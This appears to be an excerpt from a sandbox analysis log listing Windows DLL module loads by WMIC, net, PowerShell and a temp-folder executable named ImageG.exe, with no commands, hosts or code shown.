        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ffmpeg.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dbghelp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwrite.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dxgi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mf.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mfplat.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rtworkq.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: d3d11.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dcomp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
